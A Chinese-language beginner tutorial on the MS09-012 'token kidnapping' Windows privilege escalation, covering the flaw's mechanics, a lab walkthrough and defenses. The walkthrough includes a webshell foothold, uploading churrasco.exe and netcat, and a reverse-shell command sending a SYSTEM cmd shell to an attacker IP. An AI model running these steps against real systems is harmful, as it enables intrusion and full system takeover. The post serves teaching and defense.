深度拆解 MS09-012：从“低权访客”到“系统之神”的跨越

如果你刚踏入网络安全（特别是渗透测试）的大门，你一定听说过在 Windows 提权界大名鼎鼎的MS09-012（常被称作“令牌绑架”漏洞）。在很多经典的靶机演练（如 HackTheBox 的 Granny/Grandpa）中，它是新手们拿到的第一个SYSTEM​ 权限。

这篇文章，我们将化繁为简，带你从原理到实战，彻底拿下这个漏洞。

📁 一、 漏洞档案

• 漏洞名称：Windows 服务隔离权限提升漏洞（Token Kidnapping）

• 微软编号：MS09-012

• 关联 CVE：CVE-2008-1436, CVE-2009-0078, CVE-2009-0079, CVE-2009-0080

• 漏洞类型：本地权限提升（LPE）

• 危害等级：高危（CVSS 评分通常为 7.2 或更高）

• 影响系统：Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008（尤其是未打补丁的版本）

• 前置条件：攻击者必须先在目标系统上获得代码执行权限（例如通过 Web 上传了一个 ASPX 木马，拿到了 IIS 的 Worker Process 权限）。

🧠 二、 漏洞原理：到底什么是“令牌绑架”？

要理解 MS09-012，我们不需要去啃 Windows 内核的源码，只需要弄懂三个核心概念：账户权限、门禁卡（Token）​ 以及进程隔离失效。

1. Windows 的“三六九等”

在 Windows 系统中，有几个特殊的内置账户，权限从高到低排列如下：

• SYSTEM（本地系统）：神一般的存在。拥有对系统几乎所有资源的完全控制权。Windows 的核心服务（如lsass.exe,services.exe）都以这个身份运行。

• NetworkService（网络服务）：受限的普通员工。通常用于运行 IIS、SQL Server 等对外提供服务的进程。它可以对外访问网络，但在本地系统上的权限极低。

• LocalService（本地服务）：比 NetworkService 权限还要低。主要用于运行一些不需要网络访问的本地组件。

2. 什么是“令牌（Token）”？

你可以把 Windows 的 Token 想象成一张门禁卡。

当你登录系统或启动一个进程时，系统会给这个进程发一张 Token（门禁卡）。这张卡里记录了“你是谁”（用户 SID）以及“你能干什么”（特权列表）。当进程想要访问一个文件或执行某个操作时，系统就会刷卡检查权限。

通常情况下，低权限进程（NetworkService）拿到的只是一张普通员工的门禁卡，它绝对不可能去访问只有 SYSTEM 才能访问的核心区域。

3. 致命的失误：保洁借用了 CEO 的门禁卡

MS09-012 漏洞的精妙之处就在于：它利用了 Windows 系统自身组件的逻辑缺陷，让低权限进程成功“绑架”了高权限进程的 Token。

在存在漏洞的 Windows 版本中，像 WMI（Windows 管理规范）或 MSDTC（分布式事务处理协调器）等服务在运行时，会涉及到复杂的进程间通信（RPC）。问题出在：

1. 在某些特定条件下，一些以NetworkService身份运行的进程，在调用系统服务（如 WMI）时，系统会临时将一张带有SYSTEM权限的 Token（CEO 的门禁卡）留在了内存中。

2. 由于 Windows 在隔离同一账户（都是 NetworkService）下的不同进程时存在缺陷，这个账户下的任何其他进程都有权限去扫描并打开这个遗留的 Token。

3. 攻击者编写的恶意代码（比如一个上传的 ASPX 木马）一旦发现这张高权限 Token，就会毫不犹豫地“偷”过来，替换掉自己原有的低权限 Token。

瞬间，保洁阿姨变成了 CEO。​ 原本只能跑在NetworkService下的 Web 木马，摇身一变，获得了系统的至高无上权限（SYSTEM），可以干任何事情：添加管理员账户、读取所有文件、植入永恒的后门。

🛠️ 三、 漏洞复现：手把手教你提权到 SYSTEM

对于初学者，最快、最安全的复现方式是在虚拟机中搭建一个存在漏洞的旧版 Windows 环境（如Windows Server 2003 SP2），或者使用 VulnHub/HackTheBox 上的经典靶机（如Granny或Grandpa）。

这里我们模拟一次典型的 Web 渗透提权流程：

阶段一：获取初始立足点（Low Privilege Shell）

假设你已经通过某种方式（比如利用 IIS 6.0 的 WebDAV 漏洞，或者后台上传漏洞）在目标服务器上上传了一个 ASPX 格式的 WebShell，并成功执行了系统命令。

通过 WebShell 执行whoami命令，你会看到当前的身份是可怜的nt authority\network service。

cmd

C:\Windows\System32\inetsrv> whoami nt authority\network service

这说明你现在是个连改个系统配置文件都不配的“外人”，下一步就是利用 MS09-012 进行提权。

阶段二：上传并利用 Exploit（提权工具）

在这个年代，我们不需要自己去写复杂的 Token 劫持代码。安全社区早已有了成熟的自动化工具，其中最著名的就是churrasco.exe（中文圈常称其为“巴西烤肉”提权工具）或pr.exe（对应 MS09-012 的另一个著名 Exploit）。

1. 上传 Exploit：

   通过你的 WebShell 文件管理功能，或者利用命令行下载工具（如certutil或 FTP），将churrasco.exe上传到目标服务器你有写入权限的目录（例如 `C:\temp`或 IIS 的网站根目录）。

2. 执行提权命令：

   churrasco.exe的原理就是内部封装了 MS09-012 的 Token 劫持逻辑。它的使用方法非常简单，通过-d参数后面跟上你想要以 SYSTEM 权限运行的命令即可。

   例如，我们让它在本地监听一个端口，并反弹一个 SYSTEM 权限的 CMD Shell 回来（这里假设你本地有一台攻击机，IP 为192.168.1.100，正在用nc监听5555端口）：

   cmd

   C:\temp\churrasco.exe -d "C:\temp\nc.exe -e cmd.exe 192.168.1.100 5555"

   (注：如果目标没有nc.exe，你需要先把nc.exe也上传上去)

3. 见证奇迹的时刻：

   切回到你本地攻击机的终端，你会收到一个反向连接。在这个新弹回的 CMD 窗口里再次输入whoami：

   cmd

   C:\Windows\System32\inetsrv> whoami nt authority\system

   恭喜！你现在已经站在了 Windows 权限金字塔的顶端。

🛡️ 四、 如何应对与防御？

MS09-012 是一个十几年前的老旧漏洞，在现代的 Windows 系统（Windows 7 / Server 2012 及以后）中早已被彻底修复。但了解它的防御思路对安全运维依然有参考价值：

1. 及时打补丁：微软早在 2009 年就发布了对应的安全更新（MS09-012，主要涉及补丁KB952004和KB956572）。保持系统更新是防御此类底层漏洞最有效的方法。

2. 最小权限原则（PoLP）：永远不要用高权限账户（如 SYSTEM 或 Administrator）去运行 Web 服务（如 IIS）或数据库。确保 IIS 的网站池（Application Pool）以低权限的NetworkService或专用的虚拟账户运行。

3. 严格限制文件上传：绝大多数针对此漏洞的攻击，起点都是 Web 应用的上传功能。严格校验上传文件的后缀名和 Content-Type，禁止上传目录的脚本执行权限（如 IIS 中的Handler Mappings设置），可以从源头切断攻击链。

MS09-012 虽然是老漏洞，但它背后的“令牌劫持（Token Kidnapping）”思想在后来的高级渗透攻击（如 Windows 提权、横向移动）中屡见不鲜。作为初学者，弄懂了这个漏洞，你就等于打通了 Windows 访问控制模型（ACL / Token）的任督二脉。

安全之路道阻且长，但每拆解一个这样的经典案例，你脚下的基石就稳固一分。祝你在网络安全的世界里探索愉快！